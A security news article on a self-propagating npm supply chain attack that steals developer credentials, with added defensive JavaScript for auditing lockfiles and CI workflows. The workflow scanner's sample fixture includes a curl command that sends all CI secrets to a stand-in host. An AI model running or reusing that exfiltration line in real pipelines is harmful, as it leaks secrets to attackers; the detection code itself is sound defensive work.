Over 40 npm Packages Compromised in Sophisticated Supply Chain Attack

Security researchers have identified a software supply chain attack targeting the npm registry. The breach has affected over 40 packages maintained by various developers, and it highlights how exposed open-source ecosystems are to this kind of compromise.

Mechanism of the Attack

The attackers added a function named `NpmModule.updatePackage` to the affected versions. This function performs the following actions:

1. Downloads the package tarball.
2. Modifies the `package.json` file.
3. Injects a malicious script (`bundle.js`).
4. Repackages the archive.
5. Republishes it to the npm registry.

This process enables the automatic insertion of malicious code into downstream packages, thereby propagating the attack further.

Objective of the Malicious Code

The primary goal of the injected `bundle.js` script is to scan developers’ machines for sensitive information. Utilizing TruffleHog, a legitimate credential scanning tool, the script searches for various tokens and cloud credentials, including:

– `GITHUB_TOKEN`
– `NPM_TOKEN`
– `AWS_ACCESS_KEY_ID`
– `AWS_SECRET_ACCESS_KEY`

Once these credentials are identified, they are transmitted to an external server controlled by the attackers. This attack vector is effective on both Windows and Linux systems, making it particularly pervasive.

List of Affected Packages

The compromised releases include packages published under the `@ctrl` and `@nativescript-community` scopes, as well as a number of unscoped packages.

Response from the Community

Upon detection of these malicious packages, immediate actions were taken to mitigate the threat. A spokesperson from CrowdStrike stated:

“After detecting several malicious Node Package Manager (npm) packages in the public npm registry, a third-party open source repository, we swiftly removed them and proactively rotated our keys in public registries. These packages are not used in the Falcon sensor, the platform is not impacted and customers remain protected. We are working with npm and conducting a thorough investigation.”

Technical Details of the Malicious Script

The injected `bundle.js` script operates by:

1. Downloading and executing TruffleHog to scan for sensitive tokens and credentials.
2. Validating npm tokens using the `whoami` endpoint.
3. Interacting with GitHub APIs when a token is available.
4. Attempting cloud metadata discovery, which can expose short-lived credentials within cloud build agents.

The script also uses the developer’s credentials, such as GitHub personal access tokens, to create a GitHub Actions workflow in the `.github/workflows` directory. This workflow exfiltrates the collected data to a specified endpoint.

Recommendations for Developers

Developers are strongly advised to:

– Audit their development environments for the presence of the compromised packages.
– Rotate npm tokens and any other potentially exposed secrets.
– Implement robust security measures, including two-factor authentication, to safeguard their accounts.
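
One way to carry out the audit step, as an added example that is not part of the original article: the function below checks a parsed `package-lock.json` (lockfile version 2 or 3) against a list of known-bad `name@version` pairs, including aliased and nested installs. The entries in `COMPROMISED` and the sample lockfile are constructed placeholders; substitute the package names and versions from the advisory you are working from.

```javascript
// Known-bad releases as "name@version". PLACEHOLDERS, not real indicators:
// replace them with the entries from the advisory you are working from.
const COMPROMISED = new Set([
  "example-compromised-pkg@1.0.1",
  "@example-scope/example-lib@2.3.4",
]);
const WATCHED_NAMES = new Set(
  [...COMPROMISED].map((id) => id.slice(0, id.lastIndexOf("@")))
);

// "node_modules/a/node_modules/@s/b" -> "@s/b" (innermost package on the path)
function nameFromLockPath(path) {
  const marker = "node_modules/";
  const i = path.lastIndexOf(marker);
  return i === -1 ? null : path.slice(i + marker.length);
}

// `lock` is a parsed package-lock.json with lockfileVersion 2 or 3.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    // An aliased install records the real package name in `name`.
    const name = meta.name || nameFromLockPath(path);
    if (!name || !meta.version || !WATCHED_NAMES.has(name)) continue;
    const id = `${name}@${meta.version}`;
    findings.push({
      id,
      path,
      status: COMPROMISED.has(id) ? "compromised" : "other-version",
      hasInstallScript: meta.hasInstallScript === true,
    });
  }
  return findings;
}

// Constructed sample lockfile (not from a real project).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "my-app", version: "0.1.0" },
    "node_modules/example-compromised-pkg": { version: "1.0.0" },
    "node_modules/harmless-alias": {
      name: "example-compromised-pkg", version: "1.0.1", hasInstallScript: true,
    },
    "node_modules/dep/node_modules/@example-scope/example-lib": { version: "2.3.4" },
    "node_modules/left-alone": { version: "9.9.9" },
  },
};
```

In a project, pass the result of `JSON.parse` on the contents of `package-lock.json`. An `other-version` finding means a listed package is installed at a release that is not on the list, which is a candidate for pinning.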

The malicious workflow persists beyond the initially infected host. Once it has been committed, any future Continuous Integration (CI) run can trigger the exfiltration step from within the pipeline, where sensitive secrets and artifacts are inherently available.
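
Because the workflow outlives the infected machine, repositories need a review of their workflow files as well. The following is an added example, not code from the article or from any vendor: a text heuristic that flags files under `.github/workflows` which serialise the whole secrets context or combine secret references with a host outside an allowlist. `ALLOWED_HOSTS`, the sample files and the host name are assumptions made for illustration.

```javascript
// Hosts CI is expected to contact. Assumption: adjust to your organisation.
const ALLOWED_HOSTS = new Set(["github.com", "api.github.com", "registry.npmjs.org"]);
// Expression function names are case-insensitive, hence the `i` flag.
const SECRET_REF = /\$\{\{\s*(secrets\.\w+|toJSON\(\s*secrets\s*\))\s*\}\}/gi;
const URL_HOST = /https?:\/\/([A-Za-z0-9.-]+)/g;
const uniq = (xs) => [...new Set(xs)];

// Heuristic text scan of one workflow file (no YAML parsing).
function auditWorkflow(path, text) {
  const secrets = uniq([...text.matchAll(SECRET_REF)].map((m) => m[1]));
  const externalHosts = uniq(
    [...text.matchAll(URL_HOST)].map((m) => m[1].toLowerCase())
  ).filter((h) => !ALLOWED_HOSTS.has(h));
  const reasons = [];
  if (secrets.some((s) => /^tojson/i.test(s))) reasons.push("serialises the whole secrets context");
  if (secrets.length && externalHosts.length) reasons.push("secrets plus a non-allowlisted host");
  return { path, secrets, externalHosts, reasons };
}

// `files` maps repository paths to contents; only workflow files are scanned.
function auditWorkflows(files) {
  return Object.entries(files)
    .filter(([p]) => /^\.github\/workflows\/[^/]+\.ya?ml$/.test(p))
    .map(([p, text]) => auditWorkflow(p, text))
    .filter((r) => r.reasons.length > 0);
}

// Constructed sample repository contents (host and file names are made up).
const SAMPLE_FILES = {
  ".github/workflows/release.yml": [
    "on: push",
    "jobs:",
    "  publish:",
    "    runs-on: ubuntu-latest",
    "    steps:",
    "      - run: npm publish",
    "        env:",
    "          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}",
  ].join("\n"),
  ".github/workflows/unreviewed.yml": [
    "on: push",
    "jobs:",
    "  report:",
    "    runs-on: ubuntu-latest",
    "    steps:",
    "      - run: curl -d '${{ toJSON(secrets) }}' https://collector.example.invalid/in",
  ].join("\n"),
  "README.md": "docs: https://collector.example.invalid",
};
```

A hit is a prompt for review, not a verdict: compare flagged files against the repository history to see who added them and when.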

Broader Implications

This incident underscores the evolving nature of supply chain attacks. The malware’s self-propagating mechanism enables automatic infection of downstream packages, leading to a cascading compromise across the ecosystem. Such attacks highlight the need for heightened vigilance and the implementation of stringent security protocols within the software development lifecycle.

Parallel Threats: crates.io Phishing Campaign

In a related development, the Rust Security Response Working Group has issued a warning about phishing emails targeting crates.io users. These emails, originating from `security@rustfoundation[.]dev`, falsely claim a compromise of the crates.io infrastructure. Recipients are urged to click on a malicious link to rotate their login information. The link directs users to a counterfeit GitHub login page designed to steal credentials. The Rust team has confirmed that these emails are malicious and are taking steps to monitor for suspicious activity and have the phishing domain taken down.

Conclusion

The recent compromise of over 40 npm packages serves as a stark reminder of the vulnerabilities inherent in software supply chains. Developers and organizations must remain vigilant, regularly audit their dependencies, and implement comprehensive security measures to protect against such sophisticated attacks.